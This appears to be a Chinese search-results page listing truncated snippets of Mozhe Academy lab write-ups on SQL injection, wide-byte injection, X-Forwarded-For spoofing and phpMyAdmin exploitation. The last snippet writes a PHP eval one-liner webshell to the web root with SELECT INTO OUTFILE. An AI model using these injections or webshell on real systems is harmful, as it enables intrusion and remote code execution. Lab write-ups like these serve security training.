搜索结果
查询Tags标签: 墨者,共有 6条记录-
墨者学院SQL注入(MySQL)的总结:
我们打开靶机 在这个界面我们可以看见在密码的下面有一个停机公告,我们点进去,会发现可以发现这个公告是存在id的,又可以会出现漏洞。所以我们尝试着在id=1的后面加上and 1=1 我们可以发现and 1=1没有问题,然后我们在输入and 1=2 然后我们发现页面没有显示…
2022/6/27 2:20:41 人评论 次浏览 -
墨者-SQL注入漏洞测试(宽字节)
靶场地址:https://www.mozhe.cn/bug/detail/MEJyQWEyd29tN2ErT1VocThlaUNVdz09bW96aGUmozhe ①url:http://219.153.49.228:46231/new_list.php?id=1 单引号无法闭合,猜测用了转义,尝试宽字节注入id=1%df %df与转义符\组合,即url编码%df%5c,mysql会识别为一个GBK编码…
2021/12/12 19:17:57 人评论 次浏览 -
墨者-SQL注入漏洞测试(宽字节)
靶场地址:https://www.mozhe.cn/bug/detail/MEJyQWEyd29tN2ErT1VocThlaUNVdz09bW96aGUmozhe ①url:http://219.153.49.228:46231/new_list.php?id=1 单引号无法闭合,猜测用了转义,尝试宽字节注入id=1%df %df与转义符\组合,即url编码%df%5c,mysql会识别为一个GBK编码…
2021/12/12 19:17:57 人评论 次浏览 -
墨者学院—网络安全篇5
文章目录 IP地址伪造(第2题)服务器返回数据查看IP地址伪造(第2题) 背景介绍 小墨听客户说某市民生活便捷查詢系统不能正常使用,已知存在测试账户。 实训目标 1、浏览器插件Modify Headers的使用 2、X-Forwarded-For的理解 3、纯真IP地址数据库的使用 解题方向 根据页面提…
2021/9/18 6:09:47 人评论 次浏览 -
墨者学院—网络安全篇5
文章目录 IP地址伪造(第2题)服务器返回数据查看IP地址伪造(第2题) 背景介绍 小墨听客户说某市民生活便捷查詢系统不能正常使用,已知存在测试账户。 实训目标 1、浏览器插件Modify Headers的使用 2、X-Forwarded-For的理解 3、纯真IP地址数据库的使用 解题方向 根据页面提…
2021/9/18 6:09:47 人评论 次浏览 -
墨者学院——phpMyAdmin后台文件包含分析溯源
此题利用一句话*** 进入登陆界面,用burpsuite爆破得到username与password都为:root 进入SQL界面,输入一句话***(密码为leo),点击“执行”: select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php"(/var/www/html/ …
2021/6/3 20:24:34 人评论 次浏览
